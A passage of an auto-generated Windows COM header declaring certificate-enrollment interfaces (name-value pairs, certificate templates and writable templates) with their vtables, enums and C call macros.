        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509NameValuePair * This,
            /* [in] */ __RPC__in BSTR strName,
            /* [in] */ __RPC__in BSTR strValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Value )( 
            __RPC__in IX509NameValuePair * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Name )( 
            __RPC__in IX509NameValuePair * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509NameValuePairVtbl;

    interface IX509NameValuePair
    {
        CONST_VTBL struct IX509NameValuePairVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509NameValuePair_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509NameValuePair_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509NameValuePair_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509NameValuePair_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509NameValuePair_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509NameValuePair_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509NameValuePair_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509NameValuePair_Initialize(This,strName,strValue)	\
    ( (This)->lpVtbl -> Initialize(This,strName,strValue) ) 

#define IX509NameValuePair_get_Value(This,pValue)	\
    ( (This)->lpVtbl -> get_Value(This,pValue) ) 

#define IX509NameValuePair_get_Name(This,pValue)	\
    ( (This)->lpVtbl -> get_Name(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509NameValuePair_INTERFACE_DEFINED__ */


#ifndef __IX509NameValuePairs_INTERFACE_DEFINED__
#define __IX509NameValuePairs_INTERFACE_DEFINED__

/* interface IX509NameValuePairs */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509NameValuePairs;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab340-217d-11da-b2a4-000e7bbb2b09")
    IX509NameValuePairs : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePair **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IX509NameValuePair *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509NameValuePairsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509NameValuePairs * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509NameValuePairs * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509NameValuePairs * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509NameValuePairs * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509NameValuePairs * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509NameValuePairs * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509NameValuePairs * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IX509NameValuePairs * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePair **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IX509NameValuePairs * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IX509NameValuePairs * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IX509NameValuePairs * This,
            /* [in] */ __RPC__in_opt IX509NameValuePair *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IX509NameValuePairs * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IX509NameValuePairs * This);
        
        END_INTERFACE
    } IX509NameValuePairsVtbl;

    interface IX509NameValuePairs
    {
        CONST_VTBL struct IX509NameValuePairsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509NameValuePairs_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509NameValuePairs_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509NameValuePairs_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509NameValuePairs_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509NameValuePairs_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509NameValuePairs_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509NameValuePairs_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509NameValuePairs_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IX509NameValuePairs_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IX509NameValuePairs_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IX509NameValuePairs_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IX509NameValuePairs_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IX509NameValuePairs_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509NameValuePairs_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0067 */
/* [local] */ 

typedef 
enum EnrollmentTemplateProperty
    {
        TemplatePropCommonName	= 1,
        TemplatePropFriendlyName	= 2,
        TemplatePropEKUs	= 3,
        TemplatePropCryptoProviders	= 4,
        TemplatePropMajorRevision	= 5,
        TemplatePropDescription	= 6,
        TemplatePropKeySpec	= 7,
        TemplatePropSchemaVersion	= 8,
        TemplatePropMinorRevision	= 9,
        TemplatePropRASignatureCount	= 10,
        TemplatePropMinimumKeySize	= 11,
        TemplatePropOID	= 12,
        TemplatePropSupersede	= 13,
        TemplatePropRACertificatePolicies	= 14,
        TemplatePropRAEKUs	= 15,
        TemplatePropCertificatePolicies	= 16,
        TemplatePropV1ApplicationPolicy	= 17,
        TemplatePropAsymmetricAlgorithm	= 18,
        TemplatePropKeySecurityDescriptor	= 19,
        TemplatePropSymmetricAlgorithm	= 20,
        TemplatePropSymmetricKeyLength	= 21,
        TemplatePropHashAlgorithm	= 22,
        TemplatePropKeyUsage	= 23,
        TemplatePropEnrollmentFlags	= 24,
        TemplatePropSubjectNameFlags	= 25,
        TemplatePropPrivateKeyFlags	= 26,
        TemplatePropGeneralFlags	= 27,
        TemplatePropSecurityDescriptor	= 28,
        TemplatePropExtensions	= 29,
        TemplatePropValidityPeriod	= 30,
        TemplatePropRenewalPeriod	= 31
    } 	EnrollmentTemplateProperty;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0067_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0067_v0_0_s_ifspec;

#ifndef __IX509CertificateTemplate_INTERFACE_DEFINED__
#define __IX509CertificateTemplate_INTERFACE_DEFINED__

/* interface IX509CertificateTemplate */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateTemplate;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("54244A13-555A-4e22-896D-1B0E52F76406")
    IX509CertificateTemplate : public IDispatch
    {
    public:
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Property( 
            /* [in] */ enum EnrollmentTemplateProperty property,
            /* [retval][out] */ __RPC__out VARIANT *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateTemplateVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateTemplate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateTemplate * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateTemplate * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateTemplate * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateTemplate * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateTemplate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateTemplate * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Property )( 
            __RPC__in IX509CertificateTemplate * This,
            /* [in] */ enum EnrollmentTemplateProperty property,
            /* [retval][out] */ __RPC__out VARIANT *pValue);
        
        END_INTERFACE
    } IX509CertificateTemplateVtbl;

    interface IX509CertificateTemplate
    {
        CONST_VTBL struct IX509CertificateTemplateVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateTemplate_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateTemplate_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateTemplate_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateTemplate_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateTemplate_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateTemplate_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateTemplate_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateTemplate_get_Property(This,property,pValue)	\
    ( (This)->lpVtbl -> get_Property(This,property,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateTemplate_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateTemplates_INTERFACE_DEFINED__
#define __IX509CertificateTemplates_INTERFACE_DEFINED__

/* interface IX509CertificateTemplates */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateTemplates;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("13b79003-2181-11da-b2a4-000e7bbb2b09")
    IX509CertificateTemplates : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ItemByName( 
            /* [in] */ __RPC__in BSTR bstrName,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ItemByOid( 
            /* [in] */ __RPC__in_opt IObjectId *pOid,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateTemplatesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateTemplates * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateTemplates * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateTemplates * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IX509CertificateTemplates * This);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByName )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ __RPC__in BSTR bstrName,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByOid )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ __RPC__in_opt IObjectId *pOid,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppValue);
        
        END_INTERFACE
    } IX509CertificateTemplatesVtbl;

    interface IX509CertificateTemplates
    {
        CONST_VTBL struct IX509CertificateTemplatesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateTemplates_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateTemplates_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateTemplates_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateTemplates_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateTemplates_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateTemplates_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateTemplates_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateTemplates_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IX509CertificateTemplates_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IX509CertificateTemplates_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IX509CertificateTemplates_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IX509CertificateTemplates_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IX509CertificateTemplates_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define IX509CertificateTemplates_get_ItemByName(This,bstrName,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByName(This,bstrName,ppValue) ) 

#define IX509CertificateTemplates_get_ItemByOid(This,pOid,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByOid(This,pOid,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateTemplates_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0069 */
/* [local] */ 

typedef 
enum CommitTemplateFlags
    {
        CommitFlagSaveTemplateGenerateOID	= 1,
        CommitFlagSaveTemplateUseCurrentOID	= 2,
        CommitFlagSaveTemplateOverwrite	= 3,
        CommitFlagDeleteTemplate	= 4
    } 	CommitTemplateFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0069_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0069_v0_0_s_ifspec;

#ifndef __IX509CertificateTemplateWritable_INTERFACE_DEFINED__
#define __IX509CertificateTemplateWritable_INTERFACE_DEFINED__

/* interface IX509CertificateTemplateWritable */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateTemplateWritable;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("F49466A7-395A-4e9e-B6E7-32B331600DC0")
    IX509CertificateTemplateWritable : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Commit( 
            /* [in] */ CommitTemplateFlags commitFlags,
            /* [in] */ __RPC__in BSTR strServerContext) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Property( 
            /* [in] */ enum EnrollmentTemplateProperty property,
            /* [retval][out] */ __RPC__out VARIANT *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Property( 
            /* [in] */ enum EnrollmentTemplateProperty property,
            /* [in] */ VARIANT value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Template( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateTemplateWritableVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateTemplateWritable * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateTemplateWritable * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateTemplateWritable * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *Commit )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ CommitTemplateFlags commitFlags,
            /* [in] */ __RPC__in BSTR strServerContext);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Property )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ enum EnrollmentTemplateProperty property,
            /* [retval][out] */ __RPC__out VARIANT *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Property )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ enum EnrollmentTemplateProperty property,
            /* [in] */ VARIANT value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppValue);
        
        END_INTERFACE
    } IX509CertificateTemplateWritableVtbl;

    interface IX509CertificateTemplateWritable
    {
        CONST_VTBL struct IX509CertificateTemplateWritableVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateTemplateWritable_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateTemplateWritable_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateTemplateWritable_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateTemplateWritable_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateTemplateWritable_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateTemplateWritable_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateTemplateWritable_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateTemplateWritable_Initialize(This,pValue)	\
    ( (This)->lpVtbl -> Initialize(This,pValue) ) 

#define IX509CertificateTemplateWritable_Commit(This,commitFlags,strServerContext)	\
    ( (This)->lpVtbl -> Commit(This,commitFlags,strServerContext) ) 

#define IX509CertificateTemplateWritable_get_Property(This,property,pValue)	\
